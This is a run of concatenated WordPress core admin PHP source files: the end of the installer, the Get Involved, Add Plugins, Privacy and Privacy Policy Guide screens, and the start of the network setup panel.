log in. Please store it in a secure location.' ); ?></span></p> </td> </tr> <tr class="form-field form-required user-pass2-wrap hide-if-js"> <th scope="row"> <label for="pass2"><?php _e( 'Repeat Password' ); ?> <span class="description"><?php _e( '(required)' ); ?></span> </label> </th> <td> <input type="password" name="admin_password2" id="pass2" autocomplete="new-password" spellcheck="false" /> </td> </tr> <tr class="pw-weak"> <th scope="row"><?php _e( 'Confirm Password' ); ?></th> <td> <label> <input type="checkbox" name="pw_weak" class="pw-checkbox" /> <?php _e( 'Confirm use of weak password' ); ?> </label> </td> </tr> <?php endif; ?> <tr> <th scope="row"><label for="admin_email"><?php _e( 'Your Email' ); ?></label></th> <td><input name="admin_email" type="email" id="admin_email" size="25" aria-describedby="admin-email-desc" value="<?php echo esc_attr( $admin_email ); ?>" /> <p id="admin-email-desc"><?php _e( 'Double-check your email address before continuing.' ); ?></p></td> </tr> <?php $blog_privacy_selector_title = has_action( 'blog_privacy_selector' ) ? __( 'Site visibility' ) : __( 'Search engine visibility' ); ?> <tr> <th scope="row"><?php echo $blog_privacy_selector_title; ?></th> <td> <fieldset> <legend class="screen-reader-text"><span><?php echo $blog_privacy_selector_title; ?></span></legend> <?php if ( has_action( 'blog_privacy_selector' ) ) { ?> <input id="blog-public" type="radio" name="blog_public" value="1" <?php checked( 1, $blog_public ); ?> /> <label for="blog-public"><?php _e( 'Allow search engines to index this site' ); ?></label><br /> <input id="blog-norobots" type="radio" name="blog_public" aria-describedby="public-desc" value="0" <?php checked( 0, $blog_public ); ?> /> <label for="blog-norobots"><?php _e( 'Discourage search engines from indexing this site' ); ?></label> <p id="public-desc" class="description"><?php _e( 'Note: Discouraging search engines does not block access to your site — it is up to search engines to honor your request.' ); ?></p> <?php /** This action is documented in wp-admin/options-reading.php */ do_action( 'blog_privacy_selector' ); } else { ?> <label for="blog_public"><input name="blog_public" type="checkbox" id="blog_public" aria-describedby="privacy-desc" value="0" <?php checked( 0, $blog_public ); ?> /> <?php _e( 'Discourage search engines from indexing this site' ); ?></label> <p id="privacy-desc" class="description"><?php _e( 'It is up to search engines to honor this request.' ); ?></p> <?php } ?> </fieldset> </td> </tr> </table> <p class="step"><?php submit_button( __( 'Install WordPress' ), 'large', 'Submit', false, array( 'id' => 'submit' ) ); ?></p> <input type="hidden" name="language" value="<?php echo isset( $_REQUEST['language'] ) ? esc_attr( $_REQUEST['language'] ) : ''; ?>" /> </form> <?php } // End display_setup_form(). // Let's check to make sure WP isn't already installed. if ( is_blog_installed() ) { display_header(); die( '<h1>' . __( 'Already Installed' ) . '</h1>' . '<p>' . __( 'You appear to have already installed WordPress. To reinstall please clear your old database tables first.' ) . '</p>' . '<p class="step"><a href="' . esc_url( wp_login_url() ) . '">' . __( 'Log In' ) . '</a></p>' . '</body></html>' ); } /** * @global string $wp_version The WordPress version string. * @global string $required_php_version The minimum required PHP version string. * @global string[] $required_php_extensions The names of required PHP extensions. * @global string $required_mysql_version The minimum required MySQL version string. * @global wpdb $wpdb WordPress database abstraction object. */ global $wp_version, $required_php_version, $required_php_extensions, $required_mysql_version, $wpdb; $php_version = PHP_VERSION; $mysql_version = $wpdb->db_version(); $php_compat = version_compare( $php_version, $required_php_version, '>=' ); $mysql_compat = version_compare( $mysql_version, $required_mysql_version, '>=' ) || file_exists( WP_CONTENT_DIR . '/db.php' ); $version_url = sprintf( /* translators: %s: WordPress version. */ esc_url( __( 'https://wordpress.org/documentation/wordpress-version/version-%s/' ) ), sanitize_title( $wp_version ) ); $php_update_message = '</p><p>' . sprintf( /* translators: %s: URL to Update PHP page. */ __( '<a href="%s">Learn more about updating PHP</a>.' ), esc_url( wp_get_update_php_url() ) ); $annotation = wp_get_update_php_annotation(); if ( $annotation ) { $php_update_message .= '</p><p><em>' . $annotation . '</em>'; } if ( ! $mysql_compat && ! $php_compat ) { $compat = sprintf( /* translators: 1: URL to WordPress release notes, 2: WordPress version number, 3: Minimum required PHP version number, 4: Minimum required MySQL version number, 5: Current PHP version number, 6: Current MySQL version number. */ __( 'You cannot install because <a href="%1$s">WordPress %2$s</a> requires PHP version %3$s or higher and MySQL version %4$s or higher. You are running PHP version %5$s and MySQL version %6$s.' ), $version_url, $wp_version, $required_php_version, $required_mysql_version, $php_version, $mysql_version ) . $php_update_message; } elseif ( ! $php_compat ) { $compat = sprintf( /* translators: 1: URL to WordPress release notes, 2: WordPress version number, 3: Minimum required PHP version number, 4: Current PHP version number. */ __( 'You cannot install because <a href="%1$s">WordPress %2$s</a> requires PHP version %3$s or higher. You are running version %4$s.' ), $version_url, $wp_version, $required_php_version, $php_version ) . $php_update_message; } elseif ( ! $mysql_compat ) { $compat = sprintf( /* translators: 1: URL to WordPress release notes, 2: WordPress version number, 3: Minimum required MySQL version number, 4: Current MySQL version number. */ __( 'You cannot install because <a href="%1$s">WordPress %2$s</a> requires MySQL version %3$s or higher. You are running version %4$s.' ), $version_url, $wp_version, $required_mysql_version, $mysql_version ); } if ( ! $mysql_compat || ! $php_compat ) { display_header(); die( '<h1>' . __( 'Requirements Not Met' ) . '</h1><p>' . $compat . '</p></body></html>' ); } if ( isset( $required_php_extensions ) && is_array( $required_php_extensions ) ) { $missing_extensions = array(); foreach ( $required_php_extensions as $extension ) { if ( extension_loaded( $extension ) ) { continue; } $missing_extensions[] = sprintf( /* translators: 1: URL to WordPress release notes, 2: WordPress version number, 3: The PHP extension name needed. */ __( 'You cannot install because <a href="%1$s">WordPress %2$s</a> requires the %3$s PHP extension.' ), $version_url, $wp_version, $extension ); } if ( count( $missing_extensions ) > 0 ) { display_header(); die( '<h1>' . __( 'Requirements Not Met' ) . '</h1><p>' . implode( '</p><p>', $missing_extensions ) . '</p></body></html>' ); } } if ( ! is_string( $wpdb->base_prefix ) || '' === $wpdb->base_prefix ) { display_header(); die( '<h1>' . __( 'Configuration Error' ) . '</h1>' . '<p>' . sprintf( /* translators: %s: wp-config.php */ __( 'Your %s file has an empty database table prefix, which is not supported.' ), '<code>wp-config.php</code>' ) . '</p></body></html>' ); } // Set error message if DO_NOT_UPGRADE_GLOBAL_TABLES isn't set as it will break install. if ( defined( 'DO_NOT_UPGRADE_GLOBAL_TABLES' ) ) { display_header(); die( '<h1>' . __( 'Configuration Error' ) . '</h1>' . '<p>' . sprintf( /* translators: %s: DO_NOT_UPGRADE_GLOBAL_TABLES */ __( 'The constant %s cannot be defined when installing WordPress.' ), '<code>DO_NOT_UPGRADE_GLOBAL_TABLES</code>' ) . '</p></body></html>' ); } /** * @global string $wp_local_package Locale code of the package. * @global WP_Locale $wp_locale WordPress date and time locale object. * @global wpdb $wpdb WordPress database abstraction object. */ $language = ''; if ( ! empty( $_REQUEST['language'] ) ) { $language = sanitize_locale_name( $_REQUEST['language'] ); } elseif ( isset( $GLOBALS['wp_local_package'] ) ) { $language = $GLOBALS['wp_local_package']; } $scripts_to_print = array( 'jquery' ); switch ( $step ) { case 0: // Step 0. if ( wp_can_install_language_pack() && empty( $language ) ) { $languages = wp_get_available_translations(); if ( $languages ) { $scripts_to_print[] = 'language-chooser'; display_header( 'language-chooser' ); echo '<form id="setup" method="post" action="?step=1">'; wp_install_language_form( $languages ); echo '</form>'; break; } } // Deliberately fall through if we can't reach the translations API. case 1: // Step 1, direct link or from language chooser. if ( ! empty( $language ) ) { $loaded_language = wp_download_language_pack( $language ); if ( $loaded_language ) { load_default_textdomain( $loaded_language ); $GLOBALS['wp_locale'] = new WP_Locale(); } } $scripts_to_print[] = 'user-profile'; display_header(); ?> <h1><?php _ex( 'Welcome', 'Howdy' ); ?></h1> <p><?php _e( 'Welcome to the famous five-minute WordPress installation process! Just fill in the information below and you’ll be on your way to using the most extendable and powerful personal publishing platform in the world.' ); ?></p> <h2><?php _e( 'Information needed' ); ?></h2> <p><?php _e( 'Please provide the following information. Do not worry, you can always change these settings later.' ); ?></p> <?php display_setup_form(); break; case 2: if ( ! empty( $language ) && load_default_textdomain( $language ) ) { $loaded_language = $language; $GLOBALS['wp_locale'] = new WP_Locale(); } else { $loaded_language = 'en_US'; } if ( ! empty( $wpdb->error ) ) { wp_die( $wpdb->error->get_error_message() ); } $scripts_to_print[] = 'user-profile'; display_header(); // Fill in the data we gathered. $weblog_title = isset( $_POST['weblog_title'] ) ? trim( wp_unslash( $_POST['weblog_title'] ) ) : ''; $user_name = isset( $_POST['user_name'] ) ? trim( wp_unslash( $_POST['user_name'] ) ) : ''; $admin_password = isset( $_POST['admin_password'] ) ? wp_unslash( $_POST['admin_password'] ) : ''; $admin_password_check = isset( $_POST['admin_password2'] ) ? wp_unslash( $_POST['admin_password2'] ) : ''; $admin_email = isset( $_POST['admin_email'] ) ? trim( wp_unslash( $_POST['admin_email'] ) ) : ''; $public = isset( $_POST['blog_public'] ) ? (int) $_POST['blog_public'] : 1; // Check email address. $error = false; if ( empty( $user_name ) ) { // TODO: Poka-yoke. display_setup_form( __( 'Please provide a valid username.' ) ); $error = true; } elseif ( sanitize_user( $user_name, true ) !== $user_name ) { display_setup_form( __( 'The username you provided has invalid characters.' ) ); $error = true; } elseif ( $admin_password !== $admin_password_check ) { // TODO: Poka-yoke. display_setup_form( __( 'Your passwords do not match. Please try again.' ) ); $error = true; } elseif ( empty( $admin_email ) ) { // TODO: Poka-yoke. display_setup_form( __( 'You must provide an email address.' ) ); $error = true; } elseif ( ! is_email( $admin_email ) ) { // TODO: Poka-yoke. display_setup_form( __( 'Sorry, that is not a valid email address. Email addresses look like <code>username@example.com</code>.' ) ); $error = true; } if ( false === $error ) { $wpdb->show_errors(); $result = wp_install( $weblog_title, $user_name, $admin_email, $public, '', wp_slash( $admin_password ), $loaded_language ); ?> <h1><?php _e( 'Success!' ); ?></h1> <p><?php _e( 'WordPress has been installed. Thank you, and enjoy!' ); ?></p> <table class="form-table install-success"> <tr> <th><?php _e( 'Username' ); ?></th> <td><?php echo esc_html( sanitize_user( $user_name, true ) ); ?></td> </tr> <tr> <th><?php _e( 'Password' ); ?></th> <td> <?php if ( ! empty( $result['password'] ) && empty( $admin_password_check ) ) : ?> <code><?php echo esc_html( $result['password'] ); ?></code><br /> <?php endif; ?> <p><?php echo $result['password_message']; ?></p> </td> </tr> </table> <p class="step"><a href="<?php echo esc_url( wp_login_url() ); ?>"><?php _e( 'Log In' ); ?></a></p> <?php } break; } if ( ! wp_is_mobile() ) { ?> <script>var t = document.getElementById('weblog_title'); if (t){ t.focus(); }</script> <?php } wp_print_scripts( $scripts_to_print ); ?> <script> jQuery( function( $ ) { $( '.hide-if-no-js' ).removeClass( 'hide-if-no-js' ); } ); </script> </body> </html> <?php /** * Contribute administration panel. * * @package WordPress * @subpackage Administration */ /** WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; // Used in the HTML title tag. $title = __( 'Get Involved' ); list( $display_version ) = explode( '-', get_bloginfo( 'version' ) ); $header_alt_text = sprintf( /* translators: %s: Version number. */ __( 'WordPress %s' ), $display_version ); require_once ABSPATH . 'wp-admin/admin-header.php'; ?> <div class="wrap about__container"> <div class="about__header"> <div class="about__header-image"> <img src="<?php echo esc_url( admin_url( 'images/about-release-logo.svg?ver=7.0' ) ); ?>" alt="<?php echo esc_attr( $header_alt_text ); ?>" /> </div> <div class="about__header-title"> <h1> <?php _e( 'Get Involved' ); ?> </h1> </div> <div class="about__header-text"> <?php _e( 'Be the future of WordPress' ); ?> </div> </div> <nav class="about__header-navigation nav-tab-wrapper wp-clearfix" aria-label="<?php esc_attr_e( 'Secondary menu' ); ?>"> <a href="about.php" class="nav-tab"><?php _e( 'What’s New' ); ?></a> <a href="credits.php" class="nav-tab"><?php _e( 'Credits' ); ?></a> <a href="freedoms.php" class="nav-tab"><?php _e( 'Freedoms' ); ?></a> <a href="privacy.php" class="nav-tab"><?php _e( 'Privacy' ); ?></a> <a href="contribute.php" class="nav-tab nav-tab-active" aria-current="page"><?php _e( 'Get Involved' ); ?></a> </nav> <div class="about__section has-2-columns is-wider-right"> <div class="column"> <img src="<?php echo esc_url( admin_url( 'images/contribute-main.svg?ver=6.5' ) ); ?>" alt="" width="290" height="290" /> </div> <div class="column is-vertically-aligned-center"> <p><?php _e( 'Do you use WordPress for work, for personal projects, or even just for fun? You can help shape the long-term success of the open source project that powers millions of websites around the world.' ); ?></p> <p><?php _e( 'Join the diverse WordPress contributor community and connect with other people who are passionate about maintaining a free and open web.' ); ?></p> <ul> <li><?php _e( 'Be part of a global open source community.' ); ?></li> <li><?php _e( 'Apply your skills or learn new ones.' ); ?></li> <li><?php _e( 'Grow your network and make friends.' ); ?></li> </ul> </div> </div> <div class="about__section has-2-columns is-wider-left"> <div class="column is-vertically-aligned-center"> <h2 class="is-smaller-heading"><?php _e( 'No-code contribution' ); ?></h2> <p><?php _e( 'WordPress may thrive on technical contributions, but you don’t have to code to contribute. Here are some of the ways you can make an impact without writing a single line of code:' ); ?></p> <ul> <li><?php _e( '<strong>Share</strong> your knowledge in the WordPress support forums.' ); ?></li> <li><?php _e( '<strong>Write</strong> or improve documentation for WordPress.' ); ?></li> <li><?php _e( '<strong>Translate</strong> WordPress into your local language.' ); ?></li> <li><?php _e( '<strong>Create</strong> and improve WordPress educational materials.' ); ?></li> <li><?php _e( '<strong>Promote</strong> the WordPress project to your community.' ); ?></li> <li><?php _e( '<strong>Curate</strong> submissions or take photos for the Photo Directory.' ); ?></li> <li><?php _e( '<strong>Organize</strong> or participate in local Meetups and WordCamps.' ); ?></li> <li><?php _e( '<strong>Lend</strong> your creative imagination to the WordPress UI design.' ); ?></li> <li><?php _e( '<strong>Edit</strong> videos and add captions to WordPress.tv.' ); ?></li> <li><?php _e( '<strong>Explore</strong> ways to reduce the environmental impact of websites.' ); ?></li> </ul> </div> <div class="column"> <img src="<?php echo esc_url( admin_url( 'images/contribute-no-code.svg?ver=6.5' ) ); ?>" alt="" width="290" height="290" /> </div> </div> <div class="about__section has-2-columns is-wider-right"> <div class="column"> <img src="<?php echo esc_url( admin_url( 'images/contribute-code.svg?ver=6.5' ) ); ?>" alt="" width="290" height="290" /> </div> <div class="column is-vertically-aligned-center"> <h2 class="is-smaller-heading"><?php _e( 'Code-based contribution' ); ?></h2> <p><?php _e( 'If you do code, or want to learn how, you can contribute technically in numerous ways:' ); ?></p> <ul> <li><?php _e( '<strong>Find</strong> and report bugs in the WordPress core software.' ); ?></li> <li><?php _e( '<strong>Test</strong> new releases and proposed features for the Block Editor.' ); ?></li> <li><?php _e( '<strong>Write</strong> and submit patches to fix bugs or help build new features.' ); ?></li> <li><?php _e( '<strong>Contribute</strong> to the code, improve the UX, and test the WordPress app.' ); ?></li> </ul> <p><?php _e( 'WordPress embraces new technologies, while being committed to backward compatibility. The WordPress project uses the following languages and libraries:' ); ?></p> <ul> <li><?php _e( 'WordPress Core and Block Editor: HTML, CSS, PHP, SQL, JavaScript, and React.' ); ?></li> <li><?php _e( 'WordPress app: Kotlin, Java, Swift, Objective-C, Vue, Python, and TypeScript.' ); ?></li> </ul> </div> </div> <div class="about__section is-feature has-subtle-background-color"> <div class="column"> <h2><?php _e( 'Shape the future of the web with WordPress' ); ?></h2> <p><?php _e( 'Finding the area that aligns with your skills and interests is the first step toward meaningful contribution. With more than 20 Make WordPress teams working on different parts of the open source WordPress project, there’s a place for everyone, no matter what your skill set is.' ); ?></p> <p><a href="<?php echo esc_url( __( 'https://make.wordpress.org/contribute/' ) ); ?>"><?php _e( 'Find your team →' ); ?></a></p> </div> </div> </div> <?php require_once ABSPATH . 'wp-admin/admin-footer.php'; <?php /** * Install plugin administration panel. * * @package WordPress * @subpackage Administration */ // TODO: Route this page via a specific iframe handler instead of the do_action below. if ( ! defined( 'IFRAME_REQUEST' ) && isset( $_GET['tab'] ) && ( 'plugin-information' === $_GET['tab'] ) ) { define( 'IFRAME_REQUEST', true ); } /** * WordPress Administration Bootstrap. */ require_once __DIR__ . '/admin.php'; if ( ! current_user_can( 'install_plugins' ) ) { wp_die( __( 'Sorry, you are not allowed to install plugins on this site.' ) ); } if ( is_multisite() && ! is_network_admin() ) { wp_redirect( network_admin_url( 'plugin-install.php' ) ); exit; } $wp_list_table = _get_list_table( 'WP_Plugin_Install_List_Table' ); $pagenum = $wp_list_table->get_pagenum(); if ( ! empty( $_REQUEST['_wp_http_referer'] ) ) { $location = remove_query_arg( '_wp_http_referer', wp_unslash( $_SERVER['REQUEST_URI'] ) ); if ( ! empty( $_REQUEST['paged'] ) ) { $location = add_query_arg( 'paged', (int) $_REQUEST['paged'], $location ); } wp_redirect( $location ); exit; } $wp_list_table->prepare_items(); $total_pages = $wp_list_table->get_pagination_arg( 'total_pages' ); if ( $pagenum > $total_pages && $total_pages > 0 ) { wp_redirect( add_query_arg( 'paged', $total_pages ) ); exit; } // Used in the HTML title tag. $title = __( 'Add Plugins' ); $parent_file = 'plugins.php'; wp_enqueue_script( 'plugin-install' ); if ( 'plugin-information' !== $tab ) { add_thickbox(); } $body_id = $tab; wp_enqueue_script( 'updates' ); /** * Fires before each tab on the Install Plugins screen is loaded. * * The dynamic portion of the hook name, `$tab`, allows for targeting * individual tabs. * * Possible hook names include: * * - `install_plugins_pre_beta` * - `install_plugins_pre_favorites` * - `install_plugins_pre_featured` * - `install_plugins_pre_plugin-information` * - `install_plugins_pre_popular` * - `install_plugins_pre_recommended` * - `install_plugins_pre_search` * - `install_plugins_pre_upload` * * @since 2.7.0 */ do_action( "install_plugins_pre_{$tab}" ); /* * Call the pre upload action on every non-upload plugin installation screen * because the form is always displayed on these screens. */ if ( 'upload' !== $tab ) { /** This action is documented in wp-admin/plugin-install.php */ do_action( 'install_plugins_pre_upload' ); } get_current_screen()->add_help_tab( array( 'id' => 'overview', 'title' => __( 'Overview' ), 'content' => '<p>' . sprintf( /* translators: %s: https://wordpress.org/plugins/ */ __( 'Plugins hook into WordPress to extend its functionality with custom features. Plugins are developed independently from the core WordPress application by thousands of developers all over the world. All plugins in the official <a href="%s">WordPress Plugin Directory</a> are compatible with the license WordPress uses.' ), __( 'https://wordpress.org/plugins/' ) ) . '</p>' . '<p>' . __( 'You can find new plugins to install by searching or browsing the directory right here in your own Plugins section.' ) . ' <span id="live-search-desc" class="hide-if-no-js">' . __( 'The search results will be updated as you type.' ) . '</span></p>', ) ); get_current_screen()->add_help_tab( array( 'id' => 'adding-plugins', 'title' => __( 'Adding Plugins' ), 'content' => '<p>' . __( 'If you know what you are looking for, Search is your best bet. The Search screen has options to search the WordPress Plugin Directory for a particular Term, Author, or Tag. You can also search the directory by selecting popular tags. Tags in larger type mean more plugins have been labeled with that tag.' ) . '</p>' . '<p>' . __( 'If you just want to get an idea of what’s available, you can browse Featured and Popular plugins by using the links above the plugins list. These sections rotate regularly.' ) . '</p>' . '<p>' . __( 'You can also browse a user’s favorite plugins, by using the Favorites link above the plugins list and entering their WordPress.org username.' ) . '</p>' . '<p>' . __( 'If you want to install a plugin that you’ve downloaded elsewhere, click the Upload Plugin button above the plugins list. You will be prompted to upload the .zip package, and once uploaded, you can activate the new plugin.' ) . '</p>', ) ); get_current_screen()->set_help_sidebar( '<p><strong>' . __( 'For more information:' ) . '</strong></p>' . '<p>' . __( '<a href="https://wordpress.org/documentation/article/plugins-add-new-screen/">Documentation on Installing Plugins</a>' ) . '</p>' . '<p>' . __( '<a href="https://wordpress.org/support/forums/">Support forums</a>' ) . '</p>' ); get_current_screen()->set_screen_reader_content( array( 'heading_views' => __( 'Filter plugins list' ), 'heading_pagination' => __( 'Plugins list navigation' ), 'heading_list' => __( 'Plugins list' ), ) ); /** * WordPress Administration Template Header. */ require_once ABSPATH . 'wp-admin/admin-header.php'; WP_Plugin_Dependencies::initialize(); WP_Plugin_Dependencies::display_admin_notice_for_unmet_dependencies(); WP_Plugin_Dependencies::display_admin_notice_for_circular_dependencies(); ?> <div class="wrap <?php echo esc_attr( "plugin-install-tab-$tab" ); ?>"> <h1 class="wp-heading-inline"> <?php echo esc_html( $title ); ?> </h1> <?php if ( ! empty( $tabs['upload'] ) && current_user_can( 'upload_plugins' ) ) { printf( ' <a href="%s" class="upload-view-toggle page-title-action"><span class="upload">%s</span><span class="browse">%s</span></a>', ( 'upload' === $tab ) ? self_admin_url( 'plugin-install.php' ) : self_admin_url( 'plugin-install.php?tab=upload' ), __( 'Upload Plugin' ), __( 'Browse Plugins' ) ); } ?> <hr class="wp-header-end"> <?php /* * Output the upload plugin form on every non-upload plugin installation screen, so it can be * displayed via JavaScript rather then opening up the devoted upload plugin page. */ if ( 'upload' !== $tab ) { ?> <div class="upload-plugin-wrap"> <?php /** This action is documented in wp-admin/plugin-install.php */ do_action( 'install_plugins_upload' ); ?> </div> <?php $wp_list_table->views(); } /** * Fires after the plugins list table in each tab of the Install Plugins screen. * * The dynamic portion of the hook name, `$tab`, allows for targeting * individual tabs. * * Possible hook names include: * * - `install_plugins_beta` * - `install_plugins_favorites` * - `install_plugins_featured` * - `install_plugins_plugin-information` * - `install_plugins_popular` * - `install_plugins_recommended` * - `install_plugins_search` * - `install_plugins_upload` * * @since 2.7.0 * * @param int $paged The current page number of the plugins list table. */ do_action( "install_plugins_{$tab}", $paged ); ?> <span class="spinner"></span> </div> <?php wp_print_request_filesystem_credentials_modal(); wp_print_admin_notice_templates(); /** * WordPress Administration Template Footer. */ require_once ABSPATH . 'wp-admin/admin-footer.php'; <?php /** * Privacy administration panel. * * @package WordPress * @subpackage Administration */ /** WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; // Used in the HTML title tag. $title = __( 'Privacy' ); list( $display_version ) = explode( '-', get_bloginfo( 'version' ) ); $header_alt_text = sprintf( /* translators: %s: Version number. */ __( 'WordPress %s' ), $display_version ); require_once ABSPATH . 'wp-admin/admin-header.php'; ?> <div class="wrap about__container"> <div class="about__header"> <div class="about__header-image"> <img src="<?php echo esc_url( admin_url( 'images/about-release-logo.svg?ver=7.0' ) ); ?>" alt="<?php echo esc_attr( $header_alt_text ); ?>" /> </div> <div class="about__header-title"> <h1> <?php _e( 'Privacy' ); ?> </h1> </div> <div class="about__header-text"> <?php _e( 'WordPress.org takes privacy and transparency very seriously' ); ?> </div> </div> <nav class="about__header-navigation nav-tab-wrapper wp-clearfix" aria-label="<?php esc_attr_e( 'Secondary menu' ); ?>"> <a href="about.php" class="nav-tab"><?php _e( 'What’s New' ); ?></a> <a href="credits.php" class="nav-tab"><?php _e( 'Credits' ); ?></a> <a href="freedoms.php" class="nav-tab"><?php _e( 'Freedoms' ); ?></a> <a href="privacy.php" class="nav-tab nav-tab-active" aria-current="page"><?php _e( 'Privacy' ); ?></a> <a href="contribute.php" class="nav-tab"><?php _e( 'Get Involved' ); ?></a> </nav> <div class="about__section has-2-columns is-wider-right"> <div class="column about__image"> <img class="privacy-image" src="<?php echo esc_url( admin_url( 'images/privacy.svg?ver=6.5' ) ); ?>" alt="" /> </div> <div class="column is-vertically-aligned-center"> <p><?php _e( 'From time to time, your WordPress site may send data to WordPress.org — including, but not limited to — the version you are using, and a list of installed plugins and themes.' ); ?></p> <p> <?php printf( /* translators: %s: https://wordpress.org/about/stats/ */ __( 'This data is used to provide general enhancements to WordPress, which includes helping to protect your site by finding and automatically installing new updates. It is also used to calculate statistics, such as those shown on the <a href="%s">WordPress.org stats page</a>.' ), __( 'https://wordpress.org/about/stats/' ) ); ?> </p> <p> <?php printf( /* translators: %s: https://wordpress.org/about/privacy/ */ __( 'WordPress.org takes privacy and transparency very seriously. To learn more about what data is collected, and how it is used, please visit <a href="%s">the WordPress.org Privacy Policy</a>.' ), __( 'https://wordpress.org/about/privacy/' ) ); ?> </p> </div> </div> </div> <?php require_once ABSPATH . 'wp-admin/admin-footer.php'; ?> <?php /** * Privacy Policy Guide Screen. * * @package WordPress * @subpackage Administration */ /** WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; if ( ! current_user_can( 'manage_privacy_options' ) ) { wp_die( __( 'Sorry, you are not allowed to manage privacy options on this site.' ) ); } if ( ! class_exists( 'WP_Privacy_Policy_Content' ) ) { require_once ABSPATH . 'wp-admin/includes/class-wp-privacy-policy-content.php'; } // Used in the HTML title tag. $title = __( 'Privacy Policy Guide' ); add_filter( 'admin_body_class', static function ( $body_class ) { $body_class .= ' privacy-settings '; return $body_class; } ); wp_enqueue_script( 'privacy-tools' ); require_once ABSPATH . 'wp-admin/admin-header.php'; ?> <div class="privacy-settings-header"> <div class="privacy-settings-title-section"> <h1> <?php _e( 'Privacy' ); ?> </h1> </div> <nav class="privacy-settings-tabs-wrapper hide-if-no-js" aria-label="<?php esc_attr_e( 'Secondary menu' ); ?>"> <a href="<?php echo esc_url( admin_url( 'options-privacy.php' ) ); ?>" class="privacy-settings-tab"> <?php /* translators: Tab heading for Site Health Status page. */ _ex( 'Settings', 'Privacy Settings' ); ?> </a> <a href="<?php echo esc_url( admin_url( 'options-privacy.php?tab=policyguide' ) ); ?>" class="privacy-settings-tab active" aria-current="true"> <?php /* translators: Tab heading for Site Health Status page. */ _ex( 'Policy Guide', 'Privacy Settings' ); ?> </a> </nav> </div> <hr class="wp-header-end"> <?php wp_admin_notice( __( 'The Privacy Settings require JavaScript.' ), array( 'type' => 'error', 'additional_classes' => array( 'hide-if-js' ), ) ); ?> <div class="privacy-settings-body hide-if-no-js"> <h2><?php _e( 'Privacy Policy Guide' ); ?></h2> <h3 class="section-title"><?php _e( 'Introduction' ); ?></h3> <p><?php _e( 'This text template will help you to create your website’s privacy policy.' ); ?></p> <p><?php _e( 'The template contains a suggestion of sections you most likely will need. Under each section heading, you will find a short summary of what information you should provide, which will help you to get started. Some sections include suggested policy content, others will have to be completed with information from your theme and plugins.' ); ?></p> <p><?php _e( 'Please edit your privacy policy content, making sure to delete the summaries, and adding any information from your theme and plugins. Once you publish your policy page, remember to add it to your navigation menu.' ); ?></p> <p><?php _e( 'It is your responsibility to write a comprehensive privacy policy, to make sure it reflects all national and international legal requirements on privacy, and to keep your policy current and accurate.' ); ?></p> <div class="privacy-settings-accordion"> <h4 class="privacy-settings-accordion-heading"> <button aria-expanded="false" class="privacy-settings-accordion-trigger" aria-controls="privacy-settings-accordion-block-privacy-policy-guide" type="button"> <span class="title"><?php _e( 'Privacy Policy Guide' ); ?></span> <span class="icon"></span> </button> </h4> <div id="privacy-settings-accordion-block-privacy-policy-guide" class="privacy-settings-accordion-panel" hidden="hidden"> <?php $content = WP_Privacy_Policy_Content::get_default_content( true, false ); echo $content; ?> </div> </div> <hr class="hr-separator"> <h3 class="section-title"><?php _e( 'Policies' ); ?></h3> <div class="privacy-settings-accordion wp-privacy-policy-guide"> <?php WP_Privacy_Policy_Content::privacy_policy_guide(); ?> </div> </div> <?php require_once ABSPATH . 'wp-admin/admin-footer.php'; <?php /** * Network installation administration panel. * * A multi-step process allowing the user to enable a network of WordPress sites. * * @since 3.0.0 * * @package WordPress * @subpackage Administration */ define( 'WP_INSTALLING_NETWORK', true ); /** WordPress Administration Bootstrap */ require_once __DIR__ . '/admin.php'; if ( ! current_user_can( 'setup_network' ) ) { wp_die( __( 'Sorry, you are not allowed to manage options for this site.' ) ); } if ( is_multisite() ) { if ( ! is_network_admin() ) { wp_redirect( network_admin_url( 'setup.php' ) ); exit; } if ( ! defined( 'MULTISITE' ) ) { wp_die( __( 'The Network creation panel is not for WordPress MU networks.' ) ); } } require_once __DIR__ . '/includes/network.php'; // We need to create references to ms global tables to enable Network. foreach ( $wpdb->tables( 'ms_global' ) as $table => $prefixed_table ) { $wpdb->$table = $prefixed_table; } if ( ! network_domain_check() && ( ! defined( 'WP_ALLOW_MULTISITE' ) || ! WP_ALLOW_MULTISITE ) ) { wp_die( printf( /* translators: 1: WP_ALLOW_MULTISITE, 2: wp-config.php */ __( 'You must define the %1$s constant as true in your %2$s file to allow creation of a Network.' ), '<code>WP_ALLOW_MULTISITE</code>', '<code>wp-config.php</code>' ) ); } if ( is_network_admin() ) { // Used in the HTML title tag. $title = __( 'Network Setup' ); $parent_file = 'settings.php'; } else { // Used in the HTML title tag. $title = __( 'Create a Network of WordPress Sites' ); $parent_file = 'tools.php'; } $network_help = '<p>' . __( 'This screen allows you to configure a network as having subdomains (<code>site1.example.com</code>) or subdirectories (<code>example.com/site1</code>). Subdomains require wildcard subdomains to be enabled in Apache and DNS records, if your host allows it.' ) . '</p>' . '<p>' . __( 'Choose subdomains or subdirectories; this can only be switched afterwards by reconfiguring your installation. Fill out the network details, and click Install. If this does not work, you may have to add a wildcard DNS record (for subdomains) or change to another setting in Permalinks (for subdirectories).' ) . '</p>' . '<p>' . __( 'The next screen for Network Setup will give you individually-generated lines of code to add to your wp-config.php and .htaccess files. Make sure the settings of your FTP client make files starting with a dot visible, so that you can find .htaccess; you may have to create this file if it really is not there. Make backup copies of those two files.' ) . '</p>' . '<p>' . __( 'Add the designated lines of code to wp-config.php (just before <code>/*...stop editing...*/</code>) and <code>.htaccess</code> (replacing the existing WordPress rules).' ) . '</p>' . '<p>' . __( 'Once you add this code and refresh your browser, multisite should be enabled. This screen, now in the Network Admin navigation menu, will keep an archive of the added code. You can toggle between Network Admin and Site Admin by clicking on the Network Admin or an individual site name under the My Sites dropdown in the Toolbar.' ) . '</p>' . '<p>' . __( 'The choice of subdirectory sites is disabled if this setup is more than a month old because of permalink problems with “/blog/” from the main site. This disabling will be addressed in a future version.' ) . '</p>' . '<p><strong>' . __( 'For more information:' ) . '</strong></p>' . '<p>' . __( '<a href="https://developer.wordpress.org/advanced-administration/multisite/create-network/">Documentation on Creating a Network</a>' ) . '</p>' . '<p>' . __( '<a href="https://wordpress.org/documentation/article/tools-network-screen/">Documentation on the Network Screen</a>' ) . '</p>'; get_current_screen()->add_help_tab( array( 'id' => 'network', 'title' => __( 'Network' ), 'content' => $network_help, ) ); get_current_screen()->set_help_sidebar( '<p><strong>' . __( 'For more information:' ) . '</strong></p>' . 